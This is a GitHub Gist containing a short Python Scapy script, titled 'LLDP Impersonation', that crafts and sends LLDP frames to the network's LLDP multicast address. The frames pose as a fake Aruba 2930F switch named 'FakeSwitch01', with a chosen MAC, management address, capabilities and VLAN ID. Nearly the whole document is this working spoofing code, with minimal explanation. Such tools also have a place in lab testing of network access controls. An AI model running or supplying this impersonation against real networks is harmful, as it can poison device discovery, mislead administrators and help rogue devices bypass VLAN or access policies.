Created
August 5, 2021 00:46
-
-
Save zemerick1/5907cef658d248419dc4dd3048515981 to your computer and use it in GitHub Desktop.
SCAPY - LLDP Impersonation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Import Scapy | |
from scapy.all import * | |
chassis = bytearray(7) | |
#chassis[0:3] = (0x02,0x06,0x07) | |
chassis[0:3] = (0x02,0x07,0x04) | |
chassis[3:] = (0x94,0xf1,0x28,0x8b,0xaa,0x1f) | |
#chassis[3:] = str.encode('94:f1:28:8b:aa:1f', 'utf-8') | |
# Sysname | |
sysname = bytearray(7) | |
sysname[0:2] = (0x0a,0x0c) | |
sysname[2:] = str.encode('FakeSwitch01', 'utf-8') | |
# Sys Description | |
sysdesc = bytearray(12) | |
sysdesc[0:2] = (0x0c,0xa7) | |
sysdesc[2:] = str.encode('Aruba JL258A 2930F-8G-PoE+-2SFP+ Switch, revision WC.16.10.0015, ROM WC.16.01.0008 (/ws/swbuildm/rel_ajanta_qaoff/code/build/lvm(swbuildm_rel_ajanta_qaoff_rel_ajanta))', 'utf-8') | |
# Management address | |
mgmtaddr = bytearray(7) | |
mgmtaddr[0:2] = (0x10, 0x0c) | |
mgmtaddr[2:] = (0x05, 0x01, 0x0a, 0x01, 0x01, 0x08, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00) | |
#portID = bytearray( (0x04,0x07,0x03, 0x00,0x01,0x02,0xff,0xfe,0xfd) ) # fake MAC address | |
# Port ID | |
portID = bytearray((0x04, 0x02, 0x07, 0x32)) | |
# Build TTL | |
TTL = bytearray( (0x06,0x02, 0x00,0x78) ) | |
# Build capabilities | |
cap = bytearray(7) | |
cap[0:2] = (0x0e,0x04) | |
cap[2:] = (0x00, 0x14, 0x00, 0x14) | |
# Vendor specific attributes | |
vendor = bytearray(7) | |
vendor[0:2] = (0xfe, 0x06) | |
vendor[2:] = (0x00, 0x16, 0xb9, 0x02, 0x00, 0x00) | |
# Port description | |
portdescr = bytearray((0x08, 0x01, 0x32)) | |
# LLDP/MED capabilities | |
med = bytearray(7) | |
med[0:2] = (0xfe, 0x07) | |
med[2:] = (0x00, 0x12, 0xbb, 0x01, 0x00, 0x0f, 0x04) | |
# Local PVID | |
portvlan = bytearray(7) | |
portvlan[0:2] = (0xfe, 0x06) | |
portvlan[2:] = (0x00, 0x80, 0xc2, 0x01, 0x00, 0x01) | |
# End padding | |
end = bytearray( (0x00, 0x00) ) | |
# Build payload | |
payload = bytes( chassis + portID + TTL + sysname + sysdesc + cap + mgmtaddr + vendor + portdescr + med + portvlan + end ) | |
#LLDP multicast address | |
mac_lldp_multicast = '01:80:c2:00:00:0e' | |
# Build frame | |
eth = Ether(src='94:f1:28:8b:aa:1f', dst=mac_lldp_multicast, type=0x88cc) | |
frame = eth / Raw(load=bytes(payload)) / Padding(b'\x00\x00\x00\x00') | |
#frame length should be 60, minimum Ethernet frame length | |
# Output packet to console | |
frame.show() | |
# Send packet. To get proper interface run getmac/v on Windows (escape your slashes) OR ip a s eth0 on Linux | |
sendp(frame, loop=10, count=1, verbose=1, iface="\\Device\\NPF_{63914CF1-16AF-4570-A674-AEB313EBCD3B}") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment